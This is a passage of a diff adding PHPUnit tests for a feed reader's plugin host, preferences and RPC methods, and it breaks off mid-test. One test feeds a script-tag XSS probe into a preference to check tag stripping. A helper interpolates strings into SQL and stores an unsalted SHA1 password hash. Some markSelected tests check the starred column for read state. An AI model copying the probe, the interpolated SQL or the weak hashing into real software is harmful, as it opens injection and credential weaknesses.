+        $this->assertSame($plugin, $commands['my_command']['class']);
+    }
+
+    // ── Special feeds ──
+
+    public function test_add_feed_returns_id(): void {
+        $plugin = new TestPluginStorage();
+        $host = $this->createHost();
+
+        $id = $host->add_feed(Feeds::CATEGORY_SPECIAL, 'Test Feed', 'icon.png', $plugin);
+
+        $this->assertIsInt($id);
+        $this->assertEquals(0, $id);
+    }
+
+    public function test_add_feed_rejects_non_special_category(): void {
+        $plugin = new TestPluginStorage();
+        $host = $this->createHost();
+
+        $id = $host->add_feed(1, 'Bad Feed', 'icon.png', $plugin);
+        $this->assertFalse($id);
+    }
+
+    public function test_get_feeds_returns_special_feeds(): void {
+        $plugin = new TestPluginStorage();
+        $host = $this->createHost();
+
+        $host->add_feed(Feeds::CATEGORY_SPECIAL, 'Feed A', 'icon_a.png', $plugin);
+
+        $feeds = $host->get_feeds(Feeds::CATEGORY_SPECIAL);
+
+        $this->assertCount(1, $feeds);
+        $this->assertEquals('Feed A', $feeds[0]['title']);
+        $this->assertEquals('icon_a.png', $feeds[0]['icon']);
+    }
+
+    public function test_get_feeds_empty_for_non_special(): void {
+        $plugin = new TestPluginStorage();
+        $host = $this->createHost();
+
+        $host->add_feed(Feeds::CATEGORY_SPECIAL, 'Special', 'icon.png', $plugin);
+
+        $feeds = $host->get_feeds(1);
+        $this->assertCount(0, $feeds);
+    }
+
+    public function test_get_feed_handler_returns_sender(): void {
+        $plugin = new TestPluginVirtualFeed();
+        $host = $this->createHost();
+
+        $id = $host->add_feed(Feeds::CATEGORY_SPECIAL, 'Virtual Feed', 'icon.png', $plugin);
+        $handler = $host->get_feed_handler($id);
+
+        $this->assertSame($plugin, $handler);
+    }
+
+    // ── pfeed/feed ID conversion ──
+
+    public function test_pfeed_to_feed_id(): void {
+        $this->assertEquals(
+            PluginHost::pfeed_to_feed_id(1),
+            PLUGIN_FEED_BASE_INDEX - 2
+        );
+    }
+
+    public function test_feed_to_pfeed_id(): void {
+        $this->assertEquals(
+            PluginHost::feed_to_pfeed_id(1),
+            PLUGIN_FEED_BASE_INDEX
+        );
+    }
+
+    public function test_pfeed_feed_conversion_is_negation(): void {
+        $feedId = 12345;
+        $pfeedId = PluginHost::feed_to_pfeed_id($feedId);
+        $back = PluginHost::pfeed_to_feed_id($pfeedId);
+
+        // The roundtrip gives the negation (by design for feed ID space separation)
+        $this->assertEquals(-$feedId, $back);
+    }
+
+    // ── API methods ──
+
+    public function test_add_api_method_and_get(): void {
+        $plugin = new TestPluginSystem(); // system plugin required for API methods
+        $host = $this->createHost();
+
+        $host->add_api_method('my_api_method', $plugin);
+
+        $this->assertSame($plugin, $host->get_api_method('my_api_method'));
+    }
+
+    public function test_get_api_method_case_insensitive(): void {
+        $plugin = new TestPluginSystem();
+        $host = $this->createHost();
+
+        $host->add_api_method('MyMethod', $plugin);
+
+        $this->assertSame($plugin, $host->get_api_method('mymethod'));
+    }
+
+    public function test_get_api_method_returns_null_when_missing(): void {
+        $host = $this->createHost();
+        $this->assertNull($host->get_api_method('nonexistent'));
+    }
+
+    // ── Filter actions ──
+
+    public function test_add_filter_action_and_get(): void {
+        $plugin = new TestPluginStorage();
+        $host = $this->createHost();
+
+        $host->add_filter_action($plugin, 'custom_action', 'Custom action description');
+
+        $actions = $host->get_filter_actions();
+        $pluginClass = get_class($plugin);
+
+        $this->assertArrayHasKey($pluginClass, $actions);
+        $this->assertCount(1, $actions[$pluginClass]);
+        $this->assertEquals('custom_action', $actions[$pluginClass][0]['action']);
+        $this->assertEquals('Custom action description', $actions[$pluginClass][0]['description']);
+    }
+
+    // ── Plugin info ──
+
+    public function test_get_plugin_names(): void {
+        $host = $this->createHost();
+        $names = $host->get_plugin_names();
+
+        // @phpstan-ignore method.alreadyNarrowedType (phpstan knows the return type)
+        $this->assertIsArray($names);
+        // plugin names are strings
+        foreach ($names as $name) {
+            // @phpstan-ignore method.alreadyNarrowedType (phpstan knows the element type)
+            $this->assertIsString($name);
+        }
+    }
+
+    public function test_get_plugins_returns_array(): void {
+        $host = $this->createHost();
+        $plugins = $host->get_plugins();
+
+        // @phpstan-ignore method.alreadyNarrowedType (phpstan knows the return type)
+        $this->assertIsArray($plugins);
+        // each plugin is an object
+        foreach ($plugins as $plugin) {
+            $this->assertInstanceOf(Plugin::class, $plugin);
+        }
+    }
+
+    public function test_get_pdo(): void {
+        $host = $this->createHost();
+        $pdo = $host->get_pdo();
+
+        $this->assertInstanceOf(PDO::class, $pdo);
+    }
+
+    public function test_get_owner_uid(): void {
+        $host = $this->createHost();
+        $uid = $host->get_owner_uid();
+
+        $this->assertNotNull($uid);
+    }
+
+    public function test_api_version_constant(): void {
+        $this->assertEquals(2, PluginHost::API_VERSION);
+    }
+
+    // ── Scheduler integration ──
+
+    public function test_add_scheduled_task(): void {
+        $plugin = new TestPluginStorage();
+        $host = $this->createHost();
+
+        $result = $host->add_scheduled_task(
+            $plugin,
+            'test_task',
+            '@daily',
+            fn() => 0
+        );
+
+        $this->assertTrue($result);
+    }
+
+    // ── object_to_domain ──
+
+    public function test_object_to_domain(): void {
+        $plugin = new TestPluginStorage();
+        $domain = PluginHost::object_to_domain($plugin);
+
+        $this->assertEquals('testpluginstorage', $domain);
+    }
+}
+
+// ── Test plugin classes ──
+
+/**
+ * Minimal plugin for testing hook functionality.
+ */
+class TestPluginHook extends Plugin {
+    public bool $hookCalled = false;
+    public mixed $hookReturn = null;
+
+    public function init($host): void {}
+    public function about(): array { return [1.0, 'test', '', false]; }
+    public function api_version(): int { return PluginHost::API_VERSION; }
+
+    // @phpstan-ignore-next-line return.type (parent returns string but this hook only needs side effects)
+    public function hook_article_button(...$args): void { $this->hookCalled = true; }
+    public function hook_article_filter(...$args): mixed {
+        $this->hookCalled = true;
+        return $this->hookReturn ?? null;
+    }
+}
+
+/**
+ * Minimal plugin for testing storage functionality.
+ */
+class TestPluginStorage extends Plugin {
+    public function init($host): void {}
+    public function about(): array { return [1.0, 'test', '', false]; }
+    public function api_version(): int { return PluginHost::API_VERSION; }
+}
+
+/**
+ * System plugin for testing API methods (only system plugins can register API methods).
+ */
+class TestPluginSystem extends Plugin {
+    public function init($host): void {}
+    public function about(): array { return [1.0, 'test', '', true]; }
+    public function api_version(): int { return PluginHost::API_VERSION; }
+}
+
+/**
+ * Virtual feed plugin for testing special feed handlers.
+ */
+class TestPluginVirtualFeed extends Plugin implements IVirtualFeed {
+    public function init($host): void {}
+    public function about(): array { return [1.0, 'test', '', false]; }
+    public function api_version(): int { return PluginHost::API_VERSION; }
+
+    public function get_unread(int $feed_id): int { return 0; }
+    public function get_total(int $feed_id): int { return 0; }
+    public function get_headlines(int $feed_id, array $options): array { return []; }
+}

--- a/tests_integration/PrefsTest.php
+++ b/tests_integration/PrefsTest.php
@@ -1,0 +1,435 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+/**
+ * Integration tests for the Prefs class.
+ *
+ * Exercises database-backed preference get/set, caching, type casting,
+ * profile blacklisting, and reset behavior.
+ */
+final class PrefsTest extends DbTestCase {
+
+    /**
+     * Create a synthetic test user in the database.
+     *
+     * @return int The created user's ID.
+     */
+    private function createTestUser(string $login = 'test_user'): int {
+        $pdo = Db::pdo();
+        $pwdHash = 'SHA1:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'; // SHA1('password')
+
+        $pdo->exec(
+            "INSERT INTO ttrss_users (login, pwd_hash, access_level) VALUES ('{$login}', '{$pwdHash}', 0)"
+        );
+
+        return (int) $pdo->query(
+            "SELECT currval(pg_get_serial_sequence('ttrss_users', 'id'))"
+        )->fetchColumn();
+    }
+
+    /**
+     * Helper: query a raw preference value from the database.
+     */
+    private function getRawPref(string $prefName, int $ownerUid, ?int $profileId = null): ?string {
+        $pdo = Db::pdo();
+        $sth = $pdo->prepare(
+            "SELECT value FROM ttrss_user_prefs2
+             WHERE pref_name = :name AND owner_uid = :uid
+               AND (profile = :profile OR (:profile IS NULL AND profile IS NULL))"
+        );
+        $sth->execute([
+            'name'    => $prefName,
+            'uid'     => $ownerUid,
+            'profile' => $profileId,
+        ]);
+        $row = $sth->fetch(PDO::FETCH_ASSOC);
+
+        return $row ? $row['value'] : null;
+    }
+
+    // ── is_valid() ────────────────────────────────────────────────────────────
+
+    public function test_is_valid_returns_true_for_known_prefs(): void {
+        $this->assertTrue(Prefs::is_valid(Prefs::PURGE_OLD_DAYS));
+        $this->assertTrue(Prefs::is_valid(Prefs::ENABLE_FEED_CATS));
+        $this->assertTrue(Prefs::is_valid(Prefs::USER_TIMEZONE));
+        $this->assertTrue(Prefs::is_valid(Prefs::USER_LANGUAGE));
+    }
+
+    public function test_is_valid_returns_false_for_unknown_prefs(): void {
+        $this->assertFalse(Prefs::is_valid('NONEXISTENT_PREF'));
+        $this->assertFalse(Prefs::is_valid(''));
+        $this->assertFalse(Prefs::is_valid('some_random_key'));
+    }
+
+    // ── get_default() ─────────────────────────────────────────────────────────
+
+    public function test_get_default_returns_default_values(): void {
+        $this->assertSame(60, Prefs::get_default(Prefs::PURGE_OLD_DAYS));
+        $this->assertSame(30, Prefs::get_default(Prefs::DEFAULT_UPDATE_INTERVAL));
+        $this->assertTrue(Prefs::get_default(Prefs::ENABLE_FEED_CATS));
+        $this->assertFalse(Prefs::get_default(Prefs::REVERSE_HEADLINES));
+        $this->assertSame("M d, G:i", Prefs::get_default(Prefs::SHORT_DATE_FORMAT));
+        $this->assertSame("adaptive", Prefs::get_default(Prefs::_DEFAULT_VIEW_MODE));
+    }
+
+    public function test_get_default_returns_null_for_unknown_pref(): void {
+        $this->assertNull(Prefs::get_default('NONEXISTENT_PREF'));
+    }
+
+    // ── get() — defaults ─────────────────────────────────────────────────────
+
+    public function test_get_returns_default_when_no_db_row_exists(): void {
+        // uid=1 is the admin user from seed.sql, no prefs are set for it
+        $result = Prefs::get(Prefs::PURGE_OLD_DAYS, 1);
+        $this->assertSame(60, $result);
+    }
+
+    public function test_get_returns_correct_types_for_int_prefs(): void {
+        $result = Prefs::get(Prefs::PURGE_OLD_DAYS, 1);
+        $this->assertSame(60, $result);
+
+        $result = Prefs::get(Prefs::DEFAULT_UPDATE_INTERVAL, 1);
+        $this->assertSame(30, $result);
+    }
+
+    public function test_get_returns_correct_types_for_bool_prefs(): void {
+        $result = Prefs::get(Prefs::ENABLE_FEED_CATS, 1);
+        $this->assertTrue($result);
+
+        $result = Prefs::get(Prefs::REVERSE_HEADLINES, 1);
+        $this->assertFalse($result);
+    }
+
+    public function test_get_returns_correct_types_for_string_prefs(): void {
+        $result = Prefs::get(Prefs::SHORT_DATE_FORMAT, 1);
+        $this->assertSame("M d, G:i", $result);
+
+        $result = Prefs::get(Prefs::USER_TIMEZONE, 1);
+        $this->assertSame("Automatic", $result);
+    }
+
+    // ── get() — from database ────────────────────────────────────────────────
+
+    public function test_get_returns_overridden_value_from_db(): void {
+        $uid = $this->createTestUser('test_overridden');
+        $prefName = Prefs::PURGE_OLD_DAYS;
+        $value = 90;
+
+        Prefs::set($prefName, $value, $uid, null);
+
+        $result = Prefs::get($prefName, $uid);
+        $this->assertSame(90, $result);
+    }
+
+    // ── set() — basic ────────────────────────────────────────────────────────
+
+    public function test_set_inserts_new_row_into_db(): void {
+        $uid = $this->createTestUser('test_insert');
+        $prefName = Prefs::PURGE_OLD_DAYS;
+        $value = 120;
+
+        $before = $this->getRawPref($prefName, $uid, null);
+        $this->assertNull($before, 'No row should exist before set()');
+
+        $result = Prefs::set($prefName, $value, $uid, null);
+
+        $this->assertTrue($result, 'set() should return true on success');
+        $this->assertSame("120", $this->getRawPref($prefName, $uid, null),
+            'Value should be stored in the database');
+    }
+
+    public function test_set_updates_existing_row(): void {
+        $uid = $this->createTestUser('test_update');
+        $prefName = Prefs::PURGE_OLD_DAYS;
+        $value1 = 99;
+        $value2 = 200;
+
+        Prefs::set($prefName, $value1, $uid, null);
+        $firstRow = $this->getRawPref($prefName, $uid, null);
+        $this->assertSame("99", $firstRow);
+
+        Prefs::set($prefName, $value2, $uid, null);
+        $this->assertSame("200", $this->getRawPref($prefName, $uid, null),
+            'set() should UPDATE when row already exists');
+    }
+
+    public function test_set_stores_bool_as_string_in_db(): void {
+        $uid = $this->createTestUser('test_bool_db');
+        $prefName = Prefs::ENABLE_FEED_CATS;
+
+        // ENABLE_FEED_CATS defaults to true, so set false first to force a DB row
+        Prefs::set($prefName, false, $uid, null);
+        $this->assertSame("", $this->getRawPref($prefName, $uid, null),
+            'false should be stored as empty string in DB');
+
+        // Now set true — this is a change from the DB value
+        Prefs::set($prefName, true, $uid, null);
+        $this->assertSame("1", $this->getRawPref($prefName, $uid, null),
+            'true should be stored as "1" in DB');
+    }
+
+    public function test_set_stores_string_in_db(): void {
+        $uid = $this->createTestUser('test_string_db');
+        $prefName = Prefs::SHORT_DATE_FORMAT;
+        $value = "Y-m-d H:i";
+
+        Prefs::set($prefName, $value, $uid, null);
+        $this->assertSame("Y-m-d H:i", $this->getRawPref($prefName, $uid, null));
+    }
+
+    // ── set() — type casting ─────────────────────────────────────────────────
+
+    public function test_set_casts_string_to_int_for_int_prefs(): void {
+        $uid = $this->createTestUser('test_cast_int');
+        $prefName = Prefs::PURGE_OLD_DAYS;
+
+        // Pass a string "45" for an INT pref — should be cast to 45
+        Prefs::set($prefName, "45", $uid, null);
+
+        // get() should return an int
+        $result = Prefs::get($prefName, $uid);
+        $this->assertSame(45, $result);
+    }
+
+    public function test_set_casts_string_to_bool_for_bool_prefs(): void {
+        $uid = $this->createTestUser('test_cast_bool');
+        $prefName = Prefs::ENABLE_FEED_CATS;
+
+        Prefs::set($prefName, "true", $uid, null);
+        $this->assertTrue(Prefs::get($prefName, $uid));
+
+        Prefs::set($prefName, "false", $uid, null);
+        $this->assertFalse(Prefs::get($prefName, $uid));
+    }
+
+    // ── set() — strip_tags ───────────────────────────────────────────────────
+
+    public function test_set_strips_tags_from_string_values(): void {
+        $uid = $this->createTestUser('test_strip_tags');
+        $prefName = Prefs::SHORT_DATE_FORMAT;
+        $malicious = "<script>alert('xss')</script>M d, G:i";
+
+        Prefs::set($prefName, $malicious, $uid, null);
+
+        // strip_tags removes the tags, trim removes surrounding whitespace
+        $result = Prefs::get($prefName, $uid);
+        $this->assertSame("alert('xss')M d, G:i", $result);
+    }
+
+    // ── set() — no-op when value unchanged ───────────────────────────────────
+
+    public function test_set_returns_true_without_db_change_when_value_unchanged(): void {
+        $uid = $this->createTestUser('test_noop');
+        $prefName = Prefs::PURGE_OLD_DAYS;
+        $value = 60; // This is the default
+
+        // Setting the default value should still return true
+        $result = Prefs::set($prefName, $value, $uid, null);
+
+        $this->assertTrue($result, 'set() should return true even when value equals default');
+
+        // No row should have been inserted for the default value
+        // (because _get returns the default from cache, and _set sees they're equal)
+        $dbValue = $this->getRawPref($prefName, $uid, null);
+        $this->assertNull($dbValue, 'No DB row should be created when setting the default value');
+    }
+
+    // ── get_all() ────────────────────────────────────────────────────────────
+
+    public function test_get_all_returns_all_pref_definitions(): void {
+        $uid = $this->createTestUser('test_get_all');
+        $all = Prefs::get_all($uid);
+
+        $this->assertNotEmpty($all);
+
+        // Check that each returned entry has the expected structure
+        foreach ($all as $entry) {
+            $this->assertArrayHasKey('pref_name', $entry);
+            $this->assertArrayHasKey('value', $entry);
+            $this->assertArrayHasKey('type_hint', $entry);
+        }
+
+        // Check that all known pref constants are present (only those in _DEFAULTS)
+        $ref = new ReflectionClass(Prefs::class);
+        $constants = $ref->getConstants();
+
+        // Build a list of pref names that are actually in _DEFAULTS
+        $ref = new ReflectionClass(Prefs::class);
+        $defaultsConst = $ref->getReflectionConstant('_DEFAULTS');
+        $defaults = $defaultsConst->getValue();
+        $prefNames = array_keys($defaults);
+
+        $foundNames = array_column($all, 'pref_name');
+        foreach ($prefNames as $name) {
+            $this->assertContains($name, $foundNames, "Pref constant $name should be in get_all() result");
+        }
+    }
+
+    public function test_get_all_returns_default_values_for_new_user(): void {
+        $uid = $this->createTestUser('test_get_all_defaults');
+        $all = Prefs::get_all($uid);
+
+        // Find PURGE_OLD_DAYS in the result
+        $purgeOld = null;
+        foreach ($all as $entry) {
+            if ($entry['pref_name'] === Prefs::PURGE_OLD_DAYS) {
+                $purgeOld = $entry;
+                break;
+            }
+        }
+
+        $this->assertNotNull($purgeOld, 'PURGE_OLD_DAYS should be in get_all()');
+        $this->assertSame(60, $purgeOld['value']);
+        $this->assertSame(Config::T_INT, $purgeOld['type_hint']);
+    }
+
+    // ── profile blacklisting ─────────────────────────────────────────────────
+
+    public function test_set_profile_blacklisted_pref_returns_false(): void {
+        // PURGE_OLD_DAYS is in _PROFILE_BLACKLIST
+        $uid = $this->createTestUser('test_profile_bl');
+        $profileId = 100;
+
+        $result = Prefs::set(Prefs::PURGE_OLD_DAYS, 999, $uid, $profileId);
+
+        $this->assertFalse($result, 'set() should return false for blacklisted pref with profile');
+        $this->assertNull($this->getRawPref(Prefs::PURGE_OLD_DAYS, $uid, $profileId),
+            'Blacklisted pref should not be stored in the database');
+    }
+
+    public function test_set_non_blacklisted_pref_works_with_profile(): void {
+        $uid = $this->createTestUser('test_profile_nonbl');
+        $profileId = Prefs::create_profile($uid, 'test_profile_nonbl');
+        $prefName = Prefs::REVERSE_HEADLINES; // not in blacklist
+
+        $result = Prefs::set($prefName, true, $uid, $profileId);
+
+        $this->assertTrue($result, 'set() should succeed for non-blacklisted pref with profile');
+        $this->assertSame("1", $this->getRawPref($prefName, $uid, $profileId));
+    }
+
+    public function test_get_ignores_profile_for_blacklisted_pref(): void {
+        $uid = $this->createTestUser('test_profile_bl_get');
+        $profileId = 300;
+
+        // Set a non-default value for user-level (no profile)
+        Prefs::set(Prefs::PURGE_OLD_DAYS, 500, $uid, null);
+
+        // When requesting with a profile, it should return the user-level value
+        // because PURGE_OLD_DAYS is in the blacklist (profile forced to null)
+        $result = Prefs::get(Prefs::PURGE_OLD_DAYS, $uid, $profileId);
+        $this->assertSame(500, $result,
+            'Blacklisted pref should fall back to user-level value when profile is specified');
+    }
+
+    // ── reset() ──────────────────────────────────────────────────────────────
+
+    public function test_reset_clears_all_user_prefs(): void {
+        $uid = $this->createTestUser('test_reset');
+
+        // Set some prefs
+        Prefs::set(Prefs::PURGE_OLD_DAYS, 99, $uid, null);
+        Prefs::set(Prefs::REVERSE_HEADLINES, true, $uid, null);
+        Prefs::set(Prefs::USER_TIMEZONE, "America/New_York", $uid, null);
+
+        // Verify they exist
+        $countBefore = Db::pdo()->prepare(
+            "SELECT COUNT(*) FROM ttrss_user_prefs2 WHERE owner_uid = :uid"
+        );
+        $countBefore->execute(['uid' => $uid]);
+        $this->assertGreaterThanOrEqual(3, (int) $countBefore->fetchColumn());
+
+        Prefs::reset($uid, null);
+
+        // All prefs should be deleted except _PREFS_MIGRATED
+        $countAfter = Db::pdo()->prepare(
+            "SELECT COUNT(*) FROM ttrss_user_prefs2
+             WHERE owner_uid = :uid AND pref_name != :mig_key"
+        );
+        $countAfter->execute(['uid' => $uid, 'mig_key' => Prefs::_PREFS_MIGRATED]);
+        $this->assertSame(0, (int) $countAfter->fetchColumn(),
+            'All prefs should be deleted by reset() except _PREFS_MIGRATED');
+    }
+
+    public function test_reset_does_not_delete_migrated_flag(): void {
+        $uid = $this->createTestUser('test_reset_mig');
+
+        // First, simulate migration by setting _PREFS_MIGRATED
+        Prefs::set(Prefs::_PREFS_MIGRATED, "1", $uid, null);
+
+        Prefs::reset($uid, null);
+
+        $migrated = $this->getRawPref(Prefs::_PREFS_MIGRATED, $uid, null);
+        $this->assertSame("1", $migrated,
+            '_PREFS_MIGRATED should not be deleted by reset()');
+    }
+
+    // ── Profile-specific prefs ──────────────────────────────────────────────
+
+    public function test_set_and_get_profile_specific_pref(): void {
+        $uid = $this->createTestUser('test_profile_spec');
+        $profileId = Prefs::create_profile($uid, 'test_profile_spec');
+        $prefName = Prefs::REVERSE_HEADLINES;
+
+        Prefs::set($prefName, true, $uid, $profileId);
+        $result = Prefs::get($prefName, $uid, $profileId);
+
+        $this->assertTrue($result, 'Profile-specific pref should be set and retrieved correctly');
+    }
+
+    public function test_profile_pref_does_not_affect_user_level_pref(): void {
+        $uid = $this->createTestUser('test_profile_isolation');
+        $profileId = Prefs::create_profile($uid, 'test_profile_isolation');
+        $prefName = Prefs::REVERSE_HEADLINES;
+
+        // Set user-level default
+        Prefs::set($prefName, false, $uid, null);
+
+        // Set profile-level override
+        Prefs::set($prefName, true, $uid, $profileId);
+
+        // User-level should still be false
+        $userResult = Prefs::get($prefName, $uid, null);
+        $this->assertFalse($userResult, 'User-level pref should not be affected by profile override');
+
+        // Profile-level should be true
+        $profileResult = Prefs::get($prefName, $uid, $profileId);
+        $this->assertTrue($profileResult, 'Profile-level pref should return the overridden value');
+    }
+
+    // ── Edge cases ───────────────────────────────────────────────────────────
+
+    public function test_set_returns_false_for_invalid_pref_name(): void {
+        $uid = $this->createTestUser('test_invalid');
+
+        // set() triggers user_error() for invalid pref names; suppress it
+        set_error_handler(function(): bool { return true; }, E_USER_WARNING);
+        $result = Prefs::set('INVALID_PREF_NAME', 'value', $uid, null);
+        restore_error_handler();
+
+        $this->assertFalse($result, 'set() should return false for an invalid pref name');
+    }
+
+    public function test_get_with_empty_string_value_for_string_pref(): void {
+        $uid = $this->createTestUser('test_empty_string');
+        $prefName = Prefs::USER_STYLESHEET;
+
+        Prefs::set($prefName, "", $uid, null);
+        $result = Prefs::get($prefName, $uid);
+
+        $this->assertSame("", $result, 'Empty string should be stored and retrieved correctly');
+    }
+
+    public function test_multiple_users_have_isolated_prefs(): void {
+        $uid1 = $this->createTestUser('test_iso_1');
+        $uid2 = $this->createTestUser('test_iso_2');
+        $prefName = Prefs::PURGE_OLD_DAYS;
+
+        Prefs::set($prefName, 100, $uid1, null);
+        Prefs::set($prefName, 200, $uid2, null);
+
+        $this->assertSame(100, Prefs::get($prefName, $uid1));
+        $this->assertSame(200, Prefs::get($prefName, $uid2));
+    }
+}

--- a/tests_integration/RPCTest.php
+++ b/tests_integration/RPCTest.php
@@ -1,0 +1,341 @@
+<?php
+/** @group integration */
+final class RPCTest extends DbTestCase {
+
+    /**
+     * Helper to capture RPC method output via output buffering.
+     *
+     * @param array<string, mixed> $request
+     * @return string Raw output from the RPC method
+     */
+    private function captureRpcOutput(string $method, array $request): string {
+        $_REQUEST = $request;
+
+        $rpc = new RPC($request);
+
+        ob_start();
+        $rpc->$method();
+        $output = ob_get_clean();
+
+        return $output;
+    }
+
+    /**
+     * Verify that publ() sets published=1 and last_published to a valid timestamp.
+     */
+    public function test_publ_publish_article(): void {
+        $ref_id = 1; // seed.sql entry with ref_id=1
+
+        // Verify initial state: published should be NULL/false
+        $pdo = Db::pdo();
+        $stmt = $pdo->prepare("SELECT published, last_published FROM ttrss_user_entries WHERE ref_id = ? AND owner_uid = ?");
+        $stmt->execute([$ref_id, 1]);
+        $initial = $stmt->fetch();
+
+        $this->assertFalse($initial['published']);
+        $this->assertNull($initial['last_published']);
+
+        // Call publ to publish the article
+        $output = $this->captureRpcOutput('publ', [
+            'pub' => '1',
+            'id'  => (string) $ref_id,
+        ]);
+
+        // Verify JSON response
+        $result = json_decode($output, true);
+        $this->assertArrayHasKey('message', $result);
+        $this->assertEquals('UPDATE_COUNTERS', $result['message']);
+
+        // Verify database state after publ
+        $stmt->execute([$ref_id, 1]);
+        $updated = $stmt->fetch();
+
+        $this->assertTrue($updated['published']);
+        $this->assertNotNull($updated['last_published']);
+    }
+
+    /**
+     * Verify that publ() sets published=0 (un-publishes the article).
+     */
+    public function test_publ_unpublish_article(): void {
+        $ref_id = 3; // seed.sql entry with ref_id=3, initially marked=true
+
+        $pdo = Db::pdo();
+
+        // First publish it
+        $this->captureRpcOutput('publ', [
+            'pub' => '1',
+            'id'  => (string) $ref_id,
+        ]);
+
+        $stmt = $pdo->prepare("SELECT published, last_published FROM ttrss_user_entries WHERE ref_id = ? AND owner_uid = ?");
+        $stmt->execute([$ref_id, 1]);
+        $published = $stmt->fetch();
+
+        $this->assertTrue($published['published']);
+        $this->assertNotNull($published['last_published']);
+
+        // Now unpublish it
+        $output = $this->captureRpcOutput('publ', [
+            'pub' => '0',
+            'id'  => (string) $ref_id,
+        ]);
+
+        $result = json_decode($output, true);
+        $this->assertEquals('UPDATE_COUNTERS', $result['message']);
+
+        $stmt->execute([$ref_id, 1]);
+        $updated = $stmt->fetch();
+
+        $this->assertFalse($updated['published']);
+        $this->assertNotNull($updated['last_published']);
+    }
+
+    /**
+     * Verify that mark() sets marked=1 and last_marked to a valid timestamp.
+     */
+    public function test_mark_star_article(): void {
+        $ref_id = 6; // seed.sql entry with ref_id=6, initially marked=false
+
+        // Verify initial state: marked should be false
+        $pdo = Db::pdo();
+        $stmt = $pdo->prepare("SELECT marked, last_marked FROM ttrss_user_entries WHERE ref_id = ? AND owner_uid = ?");
+        $stmt->execute([$ref_id, 1]);
+        $initial = $stmt->fetch();
+
+        $this->assertFalse($initial['marked']);
+        $this->assertNull($initial['last_marked']);
+
+        // Call mark to star the article
+        $output = $this->captureRpcOutput('mark', [
+            'mark' => '1',
+            'id'   => (string) $ref_id,
+        ]);
+
+        // Verify JSON response
+        $result = json_decode($output, true);
+        $this->assertArrayHasKey('message', $result);
+        $this->assertEquals('UPDATE_COUNTERS', $result['message']);
+
+        // Verify database state after mark
+        $stmt->execute([$ref_id, 1]);
+        $updated = $stmt->fetch();
+
+        $this->assertTrue($updated['marked']);
+        $this->assertNotNull($updated['last_marked']);
+    }
+
+    /**
+     * Verify that mark() sets marked=0 (un-stars the article).
+     */
+    public function test_mark_unstar_article(): void {
+        $ref_id = 7; // seed.sql entry with ref_id=7, initially marked=false
+
+        $pdo = Db::pdo();
+
+        // First star it
+        $this->captureRpcOutput('mark', [
+            'mark' => '1',
+            'id'   => (string) $ref_id,
+        ]);
+
+        $stmt = $pdo->prepare("SELECT marked, last_marked FROM ttrss_user_entries WHERE ref_id = ? AND owner_uid = ?");
+        $stmt->execute([$ref_id, 1]);
+        $marked = $stmt->fetch();
+
+        $this->assertTrue($marked['marked']);
+        $this->assertNotNull($marked['last_marked']);
+
+        // Now un-star it
+        $output = $this->captureRpcOutput('mark', [
+            'mark' => '0',
+            'id'   => (string) $ref_id,
+        ]);
+
+        $result = json_decode($output, true);
+        $this->assertEquals('UPDATE_COUNTERS', $result['message']);
+
+        $stmt->execute([$ref_id, 1]);
+        $updated = $stmt->fetch();
+
+        $this->assertFalse($updated['marked']);
+        $this->assertNotNull($updated['last_marked']);
+    }
+
+    /**
+     * Verify that publ() updates last_published timestamp each time.
+     */
+    public function test_publ_updates_last_published_timestamp(): void {
+        $ref_id = 5;
+
+        $pdo = Db::pdo();
+        $stmt = $pdo->prepare("SELECT last_published FROM ttrss_user_entries WHERE ref_id = ? AND owner_uid = ?");
+
+        // First publish
+        $this->captureRpcOutput('publ', [
+            'pub' => '1',
+            'id'  => (string) $ref_id,
+        ]);
+
+        $stmt->execute([$ref_id, 1]);
+        $first = $stmt->fetch();
+        $first_published = $first['last_published'];
+
+        // Wait a moment and publish again
+        usleep(1000010); // ~1 second to ensure timestamp differs
+
+        $this->captureRpcOutput('publ', [
+            'pub' => '1',
+            'id'  => (string) $ref_id,
+        ]);
+
+        $stmt->execute([$ref_id, 1]);
+        $second = $stmt->fetch();
+        $second_published = $second['last_published'];
+
+        // The second timestamp should be >= the first
+        $this->assertTrue(strtotime($second_published) >= strtotime($first_published));
+    }
+
+    /**
+     * Verify that delete() removes articles from ttrss_user_entries.
+     */
+    public function test_delete_removes_articles(): void {
+        $pdo = Db::pdo();
+
+        // Verify articles exist before deletion
+        $stmt = $pdo->prepare("SELECT COUNT(*) AS cnt FROM ttrss_user_entries WHERE ref_id IN (4, 5) AND owner_uid = ?");
+        $stmt->execute([1]);
+        $this->assertEquals(2, (int) $stmt->fetch()['cnt']);
+
+        // Delete articles with ref_id 4 and 5
+        $output = $this->captureRpcOutput('delete', [
+            'ids' => '4,5',
+        ]);
+
+        $result = json_decode($output, true);
+        $this->assertEquals('UPDATE_COUNTERS', $result['message']);
+
+        // Verify articles are gone
+        $stmt->execute([1]);
+        $this->assertEquals(0, (int) $stmt->fetch()['cnt']);
+    }
+
+    /**
+     * Verify that markSelected() marks articles as read (cmode=0).
+     */
+    public function test_markSelected_mark_as_read(): void {
+        $pdo = Db::pdo();
+
+        // Verify initial state: ref_id 9 should be unmarked
+        $stmt = $pdo->prepare("SELECT marked FROM ttrss_user_entries WHERE ref_id = 9 AND owner_uid = ?");
+        $stmt->execute([1]);
+        $initial = $stmt->fetch();
+        $this->assertFalse($initial['marked']);
+
+        // Mark as read via markSelected (cmode=0 = mark as read)
+        $output = $this->captureRpcOutput('markSelected', [
+            'ids'  => [9],
+            'cmode' => 0,
+        ]);
+
+        $result = json_decode($output, true);
+        $this->assertEquals('UPDATE_COUNTERS', $result['message']);
+
+        // Verify marked=false
+        $stmt->execute([1]);
+        $updated = $stmt->fetch();
+        $this->assertFalse($updated['marked']);
+    }
+
+    /**
+     * Verify that markSelected() marks articles as unread (cmode=1).
+     */
+    public function test_markSelected_mark_as_unread(): void {
+        $pdo = Db::pdo();
+
+        // First mark as read
+        $this->captureRpcOutput('markSelected', [
+            'ids'  => [10],
+            'cmode' => 0,
+        ]);
+
+        $stmt = $pdo->prepare("SELECT marked FROM ttrss_user_entries WHERE ref_id = 10 AND owner_uid = ?");
+        $stmt->execute([1]);
+        $read = $stmt->fetch();
+        $this->assertFalse($read['marked']);
+
+        // Now mark as unread (cmode=1)
+        $output = $this->captureRpcOutput('markSelected', [
+            'ids'  => [10],
+            'cmode' => 1,
+        ]);
+
+        $result = json_decode($output, true);
+        $this->assertEquals('UPDATE_COUNTERS', $result['message']);
+
